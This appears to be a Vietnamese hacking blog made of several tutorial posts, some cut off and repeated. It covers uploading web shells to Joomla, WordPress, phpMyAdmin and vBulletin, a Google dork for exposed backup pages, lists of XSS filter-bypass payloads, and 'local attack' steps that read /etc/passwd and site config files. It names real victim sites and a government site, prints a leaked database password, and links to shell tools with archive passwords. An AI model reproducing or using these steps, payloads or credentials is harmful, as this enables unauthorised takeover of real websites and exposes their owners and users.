Tuy nhiên một số site bị cấm quyền upload hoặc bị chặn bởi file .htacess làm cho shell không chạy được hay một số lý do nào khác.
Trong tut này soleil sẽ demo phương pháp upload shell bằng
cách edit 1 file trong themes của joomla rồi thay thế bằng code shell.
Victim: http://tuannghia.com
Bước 1: Login với quyền admintrator:
username: admin
pass: soleil
Bước 2: Vào phần quản lý giao diện
Vào tap “Phần Mở Rộng”
=> “Quản lý giao diện”.
Hoặc vào theo path mặc định của joomla: administrator/index.php?option=com_templates
[ Up Shell ] Kỹ Thuật Upshell Đối Với Joomla P.I
Bước 1: Loggin với quyền admin:
admin / soleil
Bước 2: Thiết lập định dạng file cho phép upload
Chọn “Cấu hình chung” / “ Hệ thống” /“Cấu hình phương tiện”
[ Up Shell ] Bug Dork Upload Shell
B1. Sử dụng dork sau vào google
B2. Chọn 1 victim bất kỳ
http://www.vhmnetwork.com/index.php?Act=Merchants
B3. Thay đường path trên thành:
http://www.vhmnetwork.com/admin/backupstart.php
allinurl:"index.php?Act=Merchants"
B2. Chọn 1 victim bất kỳ
http://www.vhmnetwork.com/index.php?Act=Merchants
B3. Thay đường path trên thành:
http://www.vhmnetwork.com/admin/backupstart.php
[ Up Shell ] Up Shell Via phpMyAdmin
Bước 1: Tìm Path của document root
+ Thông thường vào link http://www.victim.com/xampp/ đê xem document root
Ví dụ: http://www.ehtpe.co.cu/xampp/
+ Vào Php infor() để xem path document root : C:/xampp/htdocs
+ Thông thường vào link http://www.victim.com/xampp/ đê xem document root
Ví dụ: http://www.ehtpe.co.cu/xampp/
+ Vào Php infor() để xem path document root : C:/xampp/htdocs
[ Up Shell ]Up shell đối với WordPress
Bước 1: Loggin vào với quyền admin
admin / 123456
Bước 2: vào plugins theo path:
[ XSS ] Kỹ thuật Bypass và phương pháp tấn công XSS
Trong bài trước Giới thiệu chung về XSS Soleil đã giới thiệu qua về cách kiểm tra, xác định 1 site dính XSS và một số thao thác thực thi trên sites bị dính lỗi . Trong bài này Soleil sẽ đề cập đến các kỹ thuật bypass và quá trình thực hiện 1 cuốc tấn công bằng XSS
7. Kỹ Thuật Bypass
1
số site dính XSS không thể tấn công bằng những đoạn mã đơn giản, giải pháp nghĩ
đến đó là phải bypass bộ lọc. Có một số dạng bypass đoạn mã script như sau:
"><script>alert("Check By Soleil")</script>
"><script>alert(String.fromCharCode(67, 104, 101, 99, 107, 32, 66, 121, 32, 83, 111, 108, 101, 105, 108)) </script>
'><script>alert("Check By Soleil ")</script>
'><script>alert(String.fromCharCode(67, 104, 101, 99, 107, 32, 66, 121, 32, 83, 111, 108, 101, 105, 108))</script>
<ScRIPt>aLeRT("Check By Soleil ")</ScRIPt>
<ScRIPt<aLeRT(String.fromCharCode(67, 104, 101, 99, 107, 32, 66, 121, 32, 83, 111, 108, 101, 105, 108))</ScRIPt>
"><ScRIPt>aLeRT("Check By Soleil ")</ScRIPt>
"><ScRIPt<aLeRT(String.fromCharCode(67, 104, 101, 99, 107, 32, 66, 121, 32, 83, 111, 108, 101, 105, 108)) </ScRIPt>
'><ScRIPt>aLeRT("Check By Soleil ")</ScRIPt>
'><ScRIPt<aLeRT(String.fromCharCode(67, 104, 101, 99, 107, 32, 66, 121, 32, 83, 111, 108, 101, 105, 108))</ScRIPt>
</script><script>alert("Check By Soleil ")</script>
</script><script>alert(String.fromCharCode(67, 104, 101, 99, 107, 32, 66, 121, 32, 83, 111, 108, 101, 105, 108) )</script>
"/><script>alert("Check By Soleil ")</script>
"/><script>alert(String.fromCharCode(67, 104, 101, 99, 107, 32, 66, 121, 32, 83, 111, 108, 101, 105, 108))</script>
'/><script>alert("Check By Soleil ")</script>
'/><script>alert(String.fromCharCode(67, 104, 101, 99, 107, 32, 66, 121, 32, 83, 111, 108, 101, 105, 108))</script>
</SCRIPT>"><SCRIPT>alert("Check By Soleil ")</SCRIPT>
</SCRIPT>"><SCRIPT>alert(String.fromCharCode(67, 104, 101, 99, 107, 32, 66, 121, 32, 83, 111, 108, 101, 105, 108))
</SCRIPT>">"><SCRIPT>alert("Check By Soleil ")</SCRIPT>
</SCRIPT>">'><SCRIPT>alert(String.fromCharCode(67, 104, 101, 99, 107, 32, 66, 121, 32, 83, 111, 108, 101, 105, 108))</SCRIPT>
</SCRIPT>">'<SCRIPT>alert(String.fromCharCode(67,104,101,99,107,32,66,121,32,83,111,108,101,105,108,45,86,72,66,32,89,104,58,100,117,99,100,117,110,103,46,48,56,99,108,99 ))</SCRIPT>
";alert("Check By Soleil ");"
";alert(String.fromCharCode(67, 104, 101, 99, 107, 32, 66, 121, 32, 83, 111, 108, 101, 105, 108));"
';alert("Check By Soleil ");'
';alert(String.fromCharCode(67, 104, 101, 99, 107, 32, 66, 121, 32, 83, 111, 108, 101, 105, 108));'
";alert("Check By Soleil ")
";alert(String.fromCharCode(67, 104, 101, 99, 107, 32, 66, 121, 32, 83, 111, 108, 101, 105, 108)) ';alert("Check By Soleil ")
';alert(String.fromCharCode(67, 104, 101, 99, 107, 32, 66, 121, 32, 83, 111, 108, 101, 105, 108))
Trong đó: 67, 104, 101, 99, 107,
32, 66, 121, 32, 83, 111, 108, 101, 105, 108 chính là chuỗi string “ Check By
Soleil” ở dạng char.
Ví dụ:
-
Attacker có thể chèn vào thanh tìm kiếm
site http://www.hanoi.gov.vn đoạn
mã script đã bypass sau:
<SCRIPT>alert(String.fromCharCode(67,104,101,99,107,32,66,121,32,83,111,108,101,105,108,45,86,72,66,32,89,104,58,100,117,99,100,117,110,103,46,48,56,99,108,99 ))</SCRIPT>Từ đó xác định site này đã chính lỗ hổng XSS và sẽ tìm cách để khai thác, chiếm quyền điều khiển đối với site này.
[ XSS] Giới thiệu Chung về XSS và Phương pháp kiểm tra lỗi
Trong bài thứ nhất Giới Thiệu Chung Về XSS Soleil đã giới thiệu những nội dung chính sẽ viết, Ở bài thứ 2 này soleil sẽ giải thích rõ về XSS, phương pháp check site dính XSS và 1 số thao thác khi thực hiện tấn công theo phương thức XSS.
1- XSS là gì ?
XSS( Cross-Site
Scripting ) là một trong những kỹ thuật hack website phổ biến nhất hiện nay bằng
cách chèn vào url, chèn qua các thanh tìm kiếm hoặc chèn ở bất cứ 1 textbox nào
những thẻ HTML hoặc những đoạn mã script nguy hiểm, từ đó chiếm quyền điều khiển
của victim hoặc thực hiện những mệnh lệnh mà hacker đưa ra.
2- Nguyên lý hoạt động XSS
Khi website đã bị chèn các thẻ
html hay những đoạn mã script nghĩa là đã gửi các request từ máy client đến
server nhằm chèn vào đó các thông tin vượt quá tầm kiểm soát của server.
Khi người sử dụng click vào những link đó thì toàn bộ cookies, mật khẩu lưu
trên trình duyệt được gửi về cho hacker qua email hoặc 1 file nào đó trên host đã
được thiết lập từ trước hoặc bị dẫn tới 1 trang fishing mà hacker đã thiết lập
từ trước hay bị cài đặt các chương trình virus, Trojan, backdoor trên máy
victim tùy vào mệnh lệnh của hacker
3- Phân loại XSS
XSS Có 2 dạng, đó là:
+ Persistent + Non-Persistent type
4- Mức độ nguy hiểm XSS
+ Ăn cắp cookies, mật khẩu, cướp session làm việc
+ Cài các loại virus, trojan, backdoor trên máy tính
victim
+ Deface website. Tuy nhiên nó chỉ chạy trên
trình duyệt phía client và chỉ tấn công vào bề mặt website, không
làm thay đổi cấu trúc mã nguồn, cơ sở dữ liệu của website trên server.
[ XSS ] Giới Thiệu Chung
Soleil sẽ góp 1 chút kiên thức về XSS cho ae tham khảo trong 3 bài viết.
Bài đầu tiên sẽ mang tính chất giới thiệu. Trong quá trình viết có gì
sai sót mong được ae góp ý.
Các nội dung chính:
1- XSS là gì ?
2- Nguyên lý hoạt động XSS
3- Phân loại XSS
4- Mức độ nguy hiểm XSS
5- Phương pháp check site dính lỗ hổng XSS
6- 1 số thao tác khi tấn công bằng XSS
7- Kỹ Thuật Bypass
8- Demo 1 số site dính XSS:
9- Quá trình các bước thực hiện tấn công bằng XSS
Trong bài 2, Soleil sẽ viết từ mục 1 đến mục 5 ^^
Các nội dung chính:
1- XSS là gì ?
2- Nguyên lý hoạt động XSS
3- Phân loại XSS
4- Mức độ nguy hiểm XSS
5- Phương pháp check site dính lỗ hổng XSS
6- 1 số thao tác khi tấn công bằng XSS
7- Kỹ Thuật Bypass
8- Demo 1 số site dính XSS:
9- Quá trình các bước thực hiện tấn công bằng XSS
Trong bài 2, Soleil sẽ viết từ mục 1 đến mục 5 ^^
[ Up Shell ] Vbulletin Qua Database P.I
Khi thực hiện Local Attack đối với 4rum thì include shell qua database, là 1 kỹ năng không thể thiếu bởi vì thư mục Admincp thông thường không có mấy admin sơ ý đến nỗi quên không change path và đặt file .htaccess bảo vệ. Vì vậy phương pháp include shell database được các attacker sử dụng 1 cách phổ biến
Có 3 cách để include shell, hôm nay soleil sẽ giới thiệu cách thứ nhất.
Victim: http://raoonline.net/forum.php
Giả sử soleil đã có shell
1 site trên cùng server,
Với shell này ta có thể Local
Attack sang forum: http://raoonline.net và thu được thông tin config như sau:
$config['MasterServer']['username'] = 'raovat_forum'; $config['MasterServer']['password'] = '125254857'
Bước
1: Login vào cơ sở dữ liệu:
[ Local Attack] Các Phương Pháp Local Attack
Để hoàn thành bộ tut Local Attack full, hôm nay Soleil sẽ giới thiệu bài 3, cũng chính là bài quan trọng và trọng tâm nhất trong Local Attack. Trước khi đi vào bài 3, các bạn có thể đọc qua và lấy 1 số tool cần thiết từ bài 2 - Giới thiệu tính năng 1 số shell
* Nhắc lại trình tự các bước Local Attack
1-
View danh
sách các user trong server
2-
Tìm file
config.php
3-
Get thông tin login vào database
4-
Crack hoặc change pass admin
5-
Login vào quyên quản trị và upshell
1-
View danh sách các user trên server
Muốn
local được 1 site nào đó trên server thì trướ tiên cần phải xác định
site đó có user là gì, source code là gì từ đó tìm cách đọc file
config.php của user đó
-
Một số câu lệnh để get user:
Lệnh phổ biến nhất:
Cat /etc/passwd
Tuy nhiên một số server cấm lệnh cat, có thể
sử dụng các lệnh sau một cách linh hoạt
Less /etc/passwd./cat/etc/passwdMore /etc/passwd
Ngoài ra có thể sử dụng chức năng get user
trên shell byg.php, c99.php hay bypass ở r57.php, soleil.pin, telnet.pl hoặc các
shell sau:
http://www.mediafire.com/?hi4gnmu3kpxn095
( đk: chmod 755)
Pass download: soleil_vhb
Pass dải nén: ceh.vn
-
Câu lênh get user & domain
Cat /etc/virtual/domainowners ( Chỉ dùng đối với direct admin )
2-
Tìm file path file config.php
Đối với các mã nguồn mở thì path file config được mặc định
như sau:
Lưu ý: “path” chính là path từ server dẫn tới site, ví dụ đối
với server linux, path là: /home/user/public_html
Đăng ký:
Bài đăng (Atom)